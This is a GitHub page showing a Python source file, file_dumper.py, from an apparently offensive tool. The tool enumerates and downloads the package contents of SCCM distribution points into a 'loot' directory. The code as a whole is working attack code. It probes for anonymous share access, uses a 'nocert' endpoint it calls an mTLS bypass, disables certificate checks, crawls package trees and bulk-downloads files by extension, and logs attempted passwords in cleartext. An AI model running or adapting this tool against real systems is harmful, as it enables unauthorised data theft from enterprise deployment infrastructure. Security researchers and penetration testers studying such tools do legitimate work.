-
Notifications
You must be signed in to change notification settings - Fork 32
Expand file tree
/
Copy pathfile_dumper.py
More file actions
231 lines (205 loc) · 10.7 KB
/
file_dumper.py
File metadata and controls
231 lines (205 loc) · 10.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
import os
import string
import random
import urllib
import logging
import requests
import traceback
from requests_ntlm import HttpNtlmAuth
from bs4 import BeautifulSoup
from conf import bcolors, ANONYMOUSDP, DP_DOWNLOAD_HEADERS
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)
# Suppress urllib3 warnings; requests in this file are sent with verify=False.
requests.packages.urllib3.disable_warnings()
class FileDumper():
    """Index and download files served by a distribution point over HTTP(S).

    Package contents are read from the ``sms_dp_smspkg$`` share, or from
    ``nocert_sms_dp_smspkg$`` when ``nocert`` is set. Output is written below
    ``loot/<output_dir>/``: a tree listing in ``index.txt`` (when packages are
    crawled) and downloaded files in ``packages/<package id>/``.
    """

    def __init__(self, distribution_point,
                 output_dir,
                 extensions,
                 anonymous,
                 urls,
                 recursion_depth,
                 username,
                 password,
                 pki_cert,
                 pki_key,
                 nocert
                 ):
        """Store the configuration and prepare the HTTP session.

        Args:
            distribution_point: Base URL of the distribution point. A
                ``https://`` prefix switches on the HTTPS-specific handling.
            output_dir: Name of the directory below ``loot/`` to write into.
            extensions: Iterable of filename suffixes selecting the files to
                download while crawling packages.
            anonymous: Value compared against ``ANONYMOUSDP.ENABLED.value``
                to decide whether a credential check is needed.
            urls: Path of a text file holding one URL per line, or ``None``
                to crawl the packages listed by the distribution point.
            recursion_depth: Maximum directory depth to enter per package.
            username: NTLM user name (used only when ``password`` is set too).
            password: NTLM password (used only when ``username`` is set too).
            pki_cert: Client certificate path for HTTPS without ``nocert``.
            pki_key: Client key path for HTTPS without ``nocert``.
            nocert: When truthy, use the ``nocert_sms_dp_smspkg$`` share.
        """
        self.distribution_point = distribution_point
        self.output_dir = output_dir
        self.extensions = extensions
        self.anonymous = anonymous
        self.urls = urls
        self.recursion_depth = recursion_depth
        self.username = username
        self.password = password
        self.pki_cert = pki_cert
        self.pki_key = pki_key
        self.nocert = nocert
        self.use_https = self.distribution_point.startswith('https://')
        self.package_ids = set()

        self.session = requests.Session()
        self.session.headers.update(DP_DOWNLOAD_HEADERS)
        if username is not None and password is not None:
            self.session.auth = HttpNtlmAuth(username, password)
        if self.use_https:
            if nocert:
                logger.info("[INFO] HTTPS required. Using nocert endpoint for mTLS bypass")
            else:
                logger.info("[INFO] HTTPS required. Using client certificate authentication")
                self.session.cert = (pki_cert, pki_key)
            # The server certificate is deliberately not verified.
            self.session.verify = False

    @staticmethod
    def _share_url(distribution_point, nocert):
        """Return the URL of the package share on *distribution_point*."""
        share = 'nocert_sms_dp_smspkg$' if nocert else 'sms_dp_smspkg$'
        return f"{distribution_point}/{share}"

    @staticmethod
    def _random_probe_name(length=8):
        """Return a random ASCII-letter name used to probe a non-existent path."""
        return ''.join(random.choice(string.ascii_letters) for _ in range(length))

    @staticmethod
    def print_tree(d, out, prefix=""):
        """Write the nested dict *d* to *out* as a box-drawing tree.

        Keys whose value is a dict are rendered as directories (with a
        trailing ``/``) and recursed into; every other key is a leaf.

        Args:
            d: Nested dict to render.
            out: Object with a ``write(str)`` method.
            prefix: Indentation accumulated from the parent levels.
        """
        last_index = len(d) - 1
        for i, (key, value) in enumerate(d.items()):
            is_last = i == last_index
            connector = '└── ' if is_last else '├── '
            if isinstance(value, dict):
                out.write(f"{prefix}{connector}{key}/\n")
                # Continuation prefixes are as wide as the connectors (4
                # columns) so that nested entries line up under their parent.
                child_prefix = prefix + ('    ' if is_last else '│   ')
                FileDumper.print_tree(value, out, child_prefix)
            else:
                out.write(f"{prefix}{connector}{key}\n")

    @staticmethod
    def check_anonymous_DP_connection_enabled(distribution_point, nocert):
        """Probe the share without credentials and classify the response.

        A random, presumably non-existent path is requested. The status code
        maps to an ``ANONYMOUSDP`` value: 404 -> ENABLED, 401 -> DISABLED,
        403 -> CLIENTCERT, anything else -> UNKNOWN.

        Returns:
            The ``.value`` of the matching ``ANONYMOUSDP`` member.
        """
        probe_url = (f"{FileDumper._share_url(distribution_point, nocert)}"
                     f"/{FileDumper._random_probe_name()}")
        logger.info(f"[INFO] Checking anonymous DP Connection with URL {probe_url}")
        r = requests.get(probe_url, headers=DP_DOWNLOAD_HEADERS, verify=False)
        logger.info(f"[INFO] Request returned status code {r.status_code}")
        if r.status_code == 404:
            return ANONYMOUSDP.ENABLED.value
        if r.status_code == 401:
            return ANONYMOUSDP.DISABLED.value
        if r.status_code == 403:
            return ANONYMOUSDP.CLIENTCERT.value
        return ANONYMOUSDP.UNKNOWN.value

    def check_credentials_before_download(self):
        """Return True when the configured session is accepted by the share.

        A random path is requested through the session; a 404 answer is
        taken as proof that the request got past authentication.
        """
        probe_url = (f"{self._share_url(self.distribution_point, self.nocert)}"
                     f"/{self._random_probe_name()}")
        # The logged URL is the one actually requested.
        logger.info(f"[INFO] Checking credentials with URL {probe_url}")
        r = self.session.get(probe_url)
        logger.info(f"[INFO] Request returned status code {r.status_code}")
        return r.status_code == 404

    def recursive_package_directory_fetch(self, object, directory, depth):
        """Fill *object* with the listing found at *directory*.

        Every ``<a>`` element of the returned page is inspected. Links whose
        preceding text node contains ``dir`` are treated as sub-directories
        and stored as nested dicts (or as an explanatory string once the
        recursion limit is reached); all other links are stored with the
        value ``None``. Directories are inserted before files.

        Args:
            object: Dict that receives the entries, keyed by link target.
            directory: URL of the directory listing to fetch.
            depth: Depth of the caller; incremented on entry.
        """
        depth += 1
        r = self.session.get(directory)
        soup = BeautifulSoup(r.content, 'html.parser')
        files = []
        for anchor in soup.find_all('a'):
            link_target = anchor.get('href')
            if link_target is None:
                # Anchor without an href: nothing to follow or download.
                continue
            if self.use_https:
                # Listings may contain http:// links even when served over
                # HTTPS; rewrite them so requests stay on HTTPS.
                link_target = link_target.replace('http://', 'https://')
            previous_sibling = anchor.find_previous_sibling(string=True)
            if previous_sibling and 'dir' in previous_sibling:
                if depth <= self.recursion_depth:
                    object[link_target] = {}
                    self.recursive_package_directory_fetch(object[link_target], link_target, depth)
                else:
                    logger.info("[INFO] Reached recursion depth limit")
                    object[link_target] = "Not entering this subdirectory - recursion depth limit reached"
            else:
                files.append(link_target)
        for file in files:
            object[file] = None

    def recursive_file_extract(self, data):
        """Return the file keys in *data* that end with a wanted extension.

        Args:
            data: Nested dict as built by ``recursive_package_directory_fetch``
                (files map to ``None``, directories to dicts). Any non-dict
                value yields an empty list.

        Returns:
            List of matching keys, in traversal order.
        """
        if not isinstance(data, dict):
            return []
        suffixes = tuple(self.extensions)
        to_download = []
        for key, value in data.items():
            if value is None and key.endswith(suffixes):
                to_download.append(key)
            else:
                to_download.extend(self.recursive_file_extract(value))
        return to_download

    def download_files(self, files):
        """Download every URL in *files* into its package directory.

        The third path segment of the URL is used as the package name and
        the remaining segments, joined with ``__``, as the local file name.
        The package directory must already exist. A failure on one file is
        logged and the next file is processed.
        """
        # Imported explicitly: a bare ``import urllib`` does not load the
        # ``urllib.parse`` submodule by itself.
        from urllib.parse import urlparse

        for file in files:
            try:
                path_parts = urlparse(file).path.split('/')
                filename = '__'.join(path_parts[3:])
                package = path_parts[2]
                r = self.session.get(file)
                output_file = f"loot/{self.output_dir}/packages/{package}/{filename}"
                with open(output_file, 'wb') as f:
                    f.write(r.content)
                logger.warning(f"[*] Package {package} - downloaded file {filename}")
            except Exception:
                # Best effort: report and go on. KeyboardInterrupt and
                # SystemExit are not swallowed.
                logger.error(f"{bcolors.FAIL}[!] (Skipping) Error when handling the following file: {file}{bcolors.ENDC}")
                traceback.print_exc()

    def download_target_files(self):
        """Download the URLs listed in ``self.urls``, or crawl the packages.

        When ``self.urls`` is ``None`` the work is delegated to
        ``handle_packages``. Otherwise the file is read line by line; blank
        lines are ignored, lines from which no package id can be derived are
        reported and skipped, and the remaining URLs are downloaded.
        """
        if self.urls is None:
            self.handle_packages()
            return

        from urllib.parse import urlparse

        with open(self.urls, 'r') as f:
            contents = f.read().splitlines()

        package_ids = set()
        to_download = []
        for line in contents:
            url = line.strip()
            if not url:
                continue
            try:
                package_ids.add(urlparse(url).path.split('/')[2])
            except (IndexError, ValueError):
                logger.error(f"{bcolors.FAIL}[!] (Skipping) URL has wrong format: {url}{bcolors.ENDC}")
                continue
            to_download.append(url)

        for package_id in package_ids:
            os.makedirs(f'loot/{self.output_dir}/packages/{package_id}', exist_ok=True)
        self.download_files(to_download)

    def fetch_package_ids_from_datalib(self):
        """Collect package ids from the ``datalib`` listing of the share.

        The last path segment of every link is added to ``self.package_ids``
        unless it ends with ``.INI``.
        """
        r = self.session.get(f"{self._share_url(self.distribution_point, self.nocert)}/datalib")
        soup = BeautifulSoup(r.content, 'html.parser')
        for a in soup.find_all('a'):
            href = a.get('href')
            if href is None:
                continue
            last_part = href.split('/')[-1].strip()
            if not last_part.endswith('.INI'):
                self.package_ids.add(last_part)
        logger.warning(f"{bcolors.OKGREEN}[+] Found {len(self.package_ids)} packages{bcolors.ENDC}")
        logger.info(self.package_ids)

    def handle_packages(self):
        """Index every known package and download its matching files.

        For each id in ``self.package_ids`` the directory tree is fetched,
        appended to ``loot/<output_dir>/index.txt`` and the files matching
        ``self.extensions`` are downloaded.
        """
        share_url = self._share_url(self.distribution_point, self.nocert)
        total = len(self.package_ids)
        os.makedirs(f"loot/{self.output_dir}", exist_ok=True)
        # UTF-8 is forced because the tree uses box-drawing characters that
        # many platform default encodings cannot represent.
        with open(f"loot/{self.output_dir}/index.txt", "a", encoding="utf-8") as f:
            for i, package_id in enumerate(self.package_ids):
                package_index = {package_id: {}}
                self.recursive_package_directory_fetch(package_index[package_id], f"{share_url}/{package_id}", 0)
                FileDumper.print_tree(package_index, f)
                to_download = self.recursive_file_extract(package_index[package_id])
                if to_download:
                    os.makedirs(f'loot/{self.output_dir}/packages/{package_id}', exist_ok=True)
                    self.download_files(to_download)
                # '\r' keeps the progress indicator on a single console line.
                print(f"{bcolors.BOLD}[*] Handled package {package_id} ({i+1}/{total}){bcolors.ENDC}", end='\r')
        logger.warning("\n[+] Package handling complete")

    def dump_files(self):
        """Run the dump, authenticated or not depending on ``self.anonymous``.

        With anonymous access enabled the download starts right away.
        Otherwise the credentials are checked first and the method returns
        without downloading when they are rejected.
        """
        if self.anonymous == ANONYMOUSDP.ENABLED.value:
            logger.warning("[*] Anonymous Distribution Point connection is enabled. Dumping without authentication.")
            mode = "unauthenticated"
        else:
            if self.check_credentials_before_download() is not True:
                logger.warning(f"{bcolors.FAIL}[-] It seems like provided credentials do not allow to successfully authenticate to the distribution point.{bcolors.ENDC}")
                logger.warning(f"{bcolors.FAIL}Potential explanations: HTTPS enforced on distribution point and invalid/no client certificate supplied; wrong credentials.{bcolors.ENDC}")
                logger.warning(f"{bcolors.FAIL}Attempted username: '{self.username}' - attempted password/hash: '{self.password}'{bcolors.ENDC}")
                return
            mode = "authenticated"

        if self.urls is None:
            self.fetch_package_ids_from_datalib()
            logger.warning(f"{bcolors.OKCYAN}\n[*] Starting {mode} file download with target extensions {self.extensions}{bcolors.ENDC}")
        else:
            logger.warning(f"{bcolors.OKCYAN}\n[*] Starting {mode} file download from URLs in '{self.urls}'{bcolors.ENDC}")
        self.download_target_files()